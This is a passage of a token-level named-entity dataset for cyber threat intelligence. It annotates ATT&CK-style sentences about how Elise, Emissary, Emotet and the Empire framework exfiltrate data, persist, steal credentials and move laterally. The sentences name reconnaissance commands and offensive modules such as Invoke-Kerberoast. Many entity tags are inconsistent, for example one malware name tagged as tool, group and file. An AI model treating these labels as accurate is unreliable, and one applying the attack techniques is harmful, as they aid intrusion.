"O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Elise", - "exfiltrates", - "data", - "using", - "cookie", - "values", - "that", - "are", - "Base64-encoded." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "encrypts", - "exfiltrated", - "data", - "with", - "RC4." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "executes", - "<code>systeminfo</code>", - "after", - "initial", - "communication", - "is", - "made", - "to", - "the", - "remote", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "executes", - "<code>ipconfig", - "/all</code>", - "after", - "initial", - "communication", - "is", - "made", - "to", - "the", - "remote", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "executes", - "<code>net", - "start</code>", - "after", - "initial", - "communication", - "is", - "made", - "to", - "the", - "remote", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "performs", - "timestomping", - "of", - "a", - "CAB", - "file", - "it", - "creates." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "communicates", - "over", - "HTTP", - "or", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "configures", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "Emissary", - "appends", - "junk", - "data", - "to", - "the", - "end", - "of", - "its", - "DLL", - "file", - "to", - "create", - "a", - "large", - "file", - "that", - "may", - "exceed", - "the", - "maximum", - "size", - "that", - "anti-virus", - "programs", - "can", - "scan." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "injects", - "its", - "DLL", - "file", - "into", - "a", - "newly", - "spawned", - "Internet", - "Explorer", - "process." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Emissary", - "encrypt", - "payloads", - "using", - "various", - "XOR", - "ciphers,", - "as", - "well", - "as", - "a", - "custom", - "algorithm", - "that", - "uses", - "the", - "\"srand\"", - "and", - "\"rand\"", - "functions." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "execute", - "<code>gpresult</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "download", - "files", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "execute", - "the", - "command", - "<code>net", - "localgroup", - "administrators</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Emissary", - "have", - "added", - "Run", - "Registry", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Variants", - "of", - "Emissary", - "have", - "used", - "rundll32.exe", - "in", - "Registry", - "values", - "added", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "C2", - "server", - "response", - "to", - "a", - "beacon", - "sent", - "by", - "a", - "variant", - "of", - "Emissary", - "contains", - "a", - "36-character", - "GUID", - "value", - "that", - "is", - "used", - "as", - "an", - "encryption", - "key", - "for", - "subsequent", - "network", - "communications.", - "Some", - "variants", - "of", - "Emissary", - "use", - "various", - "XOR", - "operations", - "to", - "encrypt", - "C2", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "execute", - "ver", - "and", - "systeminfo", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "execute", - "the", - "command", - "<code>ipconfig", - "/all</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "execute", - "the", - "command", - "<code>net", - "start</code>", - "to", - "interact", - "with", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "uses", - "HTTP", - "or", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "has", - "the", - "capability", - "to", - "create", - "a", - "remote", - "shell", - "and", - "execute", - "specified", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Emissary", - "is", - "capable", - "of", - "configuring", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "encrypting", - "the", - "data", - "it", - "collects", - "before", - "sending", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "is", - "known", - "to", - "use", - "RSA", - "keys", - "for", - "encrypting", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "obfuscated", - "macros", - "within", - "malicious", - "documents", - "to", - "hide", - "the", - "URLs", - "hosting", - "the", - "malware,", - "CMD.exe", - "arguments,", - "and", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "leveraging", - "a", - "module", - "that", - "retrieves", - "passwords", - "stored", - "on", - "a", - "system", - "for", - "the", - "current", - "logged-on", - "user." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "dropping", - "browser", - "password", - "grabber", - "modules." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "a", - "self-extracting", - "RAR", - "file", - "to", - "deliver", - "modules", - "to", - "victims.", - "Emotet", - "has", - "also", - "extracted", - "embedded", - "executables", - "from", - "files", - "using", - "hard-coded", - "buffer", - "offsets." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "injecting", - "in", - "to", - "Explorer.exe", - "and", - "other", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "leveraging", - "a", - "module", - "that", - "can", - "scrape", - "email", - "addresses", - "from", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "leveraging", - "a", - "module", - "that", - "can", - "scrape", - "email", - "addresses", - "from", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "dropped", - "an", - "embedded", - "executable", - "at", - "`%Temp%\\setup.exe`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "seen", - "exploiting", - "SMB", - "via", - "a", - "vulnerability", - "exploit", - "like", - "EternalBlue", - "(MS17-010)", - "to", - "achieve", - "lateral", - "movement", - "and", - "propagation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "dropping", - "password", - "grabber", - "modules", - "including", - "Mimikatz." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "copied", - "itself", - "to", - "remote", - "systems", - "using", - "the", - "`service.exe`", - "filename." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "can", - "brute", - "force", - "a", - "local", - "admin", - "password,", - "then", - "use", - "it", - "to", - "facilitate", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "leveraging", - "a", - "module", - "that", - "scrapes", - "email", - "data", - "from", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "link", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "installed", - "itself", - "as", - "a", - "new", - "service", - "with", - "the", - "service", - "name", - "`Windows", - "Defender", - "System", - "Service`", - "and", - "display", - "name", - "`WinDefService`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "`CreateProcess`", - "to", - "create", - "a", - "new", - "process", - "to", - "run", - "its", - "executable", - "and", - "`WNetEnumResourceW`", - "to", - "enumerate", - "non-hidden", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "enumerated", - "non-hidden", - "network", - "shares", - "using", - "`WNetEnumResourceW`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "to", - "hook", - "network", - "APIs", - "to", - "monitor", - "network", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "HTTP", - "over", - "ports", - "such", - "as", - "20,", - "22,", - "443,", - "7080,", - "and", - "50000,", - "in", - "addition", - "to", - "using", - "ports", - "commonly", - "associated", - "with", - "HTTP/S." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "using", - "a", - "hard", - "coded", - "list", - "of", - "passwords", - "to", - "brute", - "force", - "user", - "accounts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "Powershell", - "to", - "retrieve", - "the", - "malicious", - "payload", - "and", - "download", - "additional", - "resources", - "like", - "Mimikatz." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "enumerating", - "local", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "reflectively", - "loaded", - "payloads", - "into", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "adding", - "the", - "downloaded", - "payload", - "to", - "the", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "key", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "leveraged", - "the", - "Admin$,", - "C$,", - "and", - "IPC$", - "shares", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "maintained", - "persistence", - "through", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "custom", - "packers", - "to", - "protect", - "its", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "delivered", - "by", - "phishing", - "emails", - "containing", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "delivered", - "by", - "phishing", - "emails", - "containing", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "Google’s", - "Protobufs", - "to", - "serialize", - "data", - "sent", - "to", - "and", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "enumerated", - "all", - "users", - "connected", - "to", - "network", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "the", - "ability", - "to", - "duplicate", - "the", - "user’s", - "token." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "sent", - "Microsoft", - "Word", - "documents", - "with", - "embedded", - "macros", - "that", - "will", - "invoke", - "scripts", - "to", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "can", - "extract", - "names", - "of", - "all", - "locally", - "reachable", - "Wi-Fi", - "networks", - "and", - "then", - "perform", - "a", - "brute-force", - "attack", - "to", - "spread", - "to", - "new", - "networks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "cmd.exe", - "to", - "run", - "a", - "PowerShell", - "script." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "used", - "WMI", - "to", - "execute", - "powershell.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Emotet", - "has", - "been", - "observed", - "creating", - "new", - "services", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "PowerSploit's", - "<code>Invoke-TokenManipulation</code>", - "to", - "manipulate", - "access", - "tokens." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "leverage", - "WMI", - "debugging", - "to", - "remotely", - "replace", - "binaries", - "like", - "sethc.exe,", - "Utilman.exe,", - "and", - "Magnify.exe", - "with", - "cmd.exe." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Empire", - "can", - "ZIP", - "directories", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "TLS", - "to", - "encrypt", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "automatically", - "gather", - "the", - "username,", - "domain", - "name,", - "machine", - "name,", - "and", - "other", - "information", - "from", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "the", - "ability", - "to", - "automatically", - "send", - "collected", - "data", - "back", - "to", - "the", - "threat", - "actors'", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "Dropbox", - "and", - "GitHub", - "for", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "the", - "ability", - "to", - "gather", - "browser", - "data", - "such", - "as", - "bookmarks", - "and", - "visited", - "sites." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "includes", - "various", - "modules", - "to", - "attempt", - "to", - "bypass", - "UAC", - "for", - "escalation", - "of", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "harvest", - "clipboard", - "data", - "on", - "both", - "Windows", - "and", - "macOS", - "systems." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "the", - "ability", - "to", - "obfuscate", - "commands", - "using", - "<code>Invoke-Obfuscation</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Empire", - "uses", - "a", - "command-line", - "interface", - "to", - "interact", - "with", - "systems." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "<code>Invoke-RunAs</code>", - "to", - "make", - "tokens." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "some", - "modules", - "that", - "leverage", - "API", - "hooking", - "to", - "carry", - "out", - "tasks,", - "such", - "as", - "netripper." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "various", - "modules", - "to", - "search", - "for", - "files", - "containing", - "passwords." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "modules", - "that", - "extract", - "passwords", - "from", - "common", - "web", - "browsers", - "such", - "as", - "Firefox", - "and", - "Chrome." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "various", - "DLL", - "hijacking", - "opportunities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "utilize", - "<code>Invoke-DCOM</code>", - "to", - "leverage", - "remote", - "COM", - "execution", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "acquire", - "local", - "and", - "domain", - "user", - "account", - "information." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "a", - "module", - "for", - "creating", - "a", - "new", - "domain", - "user", - "if", - "permissions", - "allow." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "modules", - "for", - "enumerating", - "domain", - "trusts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "a", - "dylib", - "hijacker", - "module", - "that", - "generates", - "a", - "malicious", - "dylib", - "given", - "the", - "path", - "to", - "a", - "legitimate", - "dylib", - "of", - "a", - "vulnerable", - "application." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "send", - "data", - "gathered", - "from", - "a", - "target", - "through", - "the", - "command", - "and", - "control", - "channel." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "Dropbox", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "GitHub", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "exploit", - "vulnerabilities", - "such", - "as", - "MS16-032", - "and", - "MS16-135." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Empire", - "has", - "a", - "limited", - "number", - "of", - "built-in", - "modules", - "for", - "exploiting", - "remote", - "SMB,", - "JBoss,", - "and", - "Jenkins", - "servers." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Empire", - "includes", - "various", - "modules", - "for", - "finding", - "files", - "of", - "interest", - "on", - "hosts", - "and", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "leverage", - "its", - "implementation", - "of", - "Mimikatz", - "to", - "obtain", - "and", - "use", - "golden", - "tickets." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "includes", - "various", - "modules", - "for", - "enumerating", - "Group", - "Policy." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "<code>New-GPOImmediateTask</code>", - "to", - "modify", - "a", - "GPO", - "that", - "will", - "install", - "and", - "execute", - "a", - "malicious", - "Scheduled", - "Task/Job." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "upload", - "and", - "download", - "to", - "and", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "uses", - "PowerSploit's", - "<code>Invoke-Kerberoast</code>", - "to", - "request", - "service", - "tickets", - "and", - "return", - "crackable", - "ticket", - "hashes." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - 